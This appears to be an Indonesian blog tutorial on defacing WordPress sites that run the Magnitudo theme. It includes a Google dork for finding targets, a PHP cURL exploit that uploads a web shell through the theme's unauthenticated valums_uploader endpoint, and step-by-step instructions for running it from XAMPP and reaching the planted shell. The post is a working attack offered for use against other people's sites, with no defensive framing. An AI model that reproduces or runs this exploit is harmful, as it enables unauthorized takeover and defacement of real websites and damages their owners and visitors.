Google Dork :inurl:wp-content/themes/magnitudo
Use your brain untuk menemukan dork lainnya :)
Exploit :
<?php
$uploadfile
=
"shell.php"
;
$ch
= curl_init(
"http://site.com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php"
);
curl_setopt(
$ch
, CURLOPT_POST, true);
curl_setopt(
$ch
, CURLOPT_POSTFIELDS,
array
(
'qqfile'
=>
"@$uploadfile"
));
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
$postResult
= curl_exec(
$ch
);
curl_close(
$ch
);
"$postResult"
;
?>
Pertama download XAMMP nya HERE HERE
Jika Sudah , Cari File php.ini di System[C] -> Xammp -> Php -> Php.ini
Lalu tekan Control F dan ketikkan "curl" tanpa tanda kutip , lalu jika ketemu kamu hapus tandan ( ; ) , Lalu save ..
Oke , sekarang kamu Copy Exploitnya dan save dengan extensi .php
Simpan di folder xammp -> xammp -> PHP
Kedua , kamu copy shell kamu ke Folder xammp -> xammp -> PHP
Misalkan nama shell anda x.php ganti shell php yang ada di exploit tadi
$uploadfile="shell.php"; kamu rename dengan nama shell kamu tadi jika namanya x.php kamu rename menjadi x.php juga :))
Oke sekarang langsung saja , Pertama kita cari target dengan GOOGLE DORK tadi
Ex : http:/www.site.com/
Lalu tambahkan dengan exploitnya
/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php
Jika Ada Error Files Upload berarti itu vuln .
Buka exploitnya kamu copy semuanya ke exploit tadi
Lalu buka CMD ,
Ketikkan cd xammp enter >> cd php enter
Jika succes , filenya akan berada disini
http:
//site.com/wordpress/wp-content/uploads/2013/10/x.php
0 Response to " Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability "
Post a Comment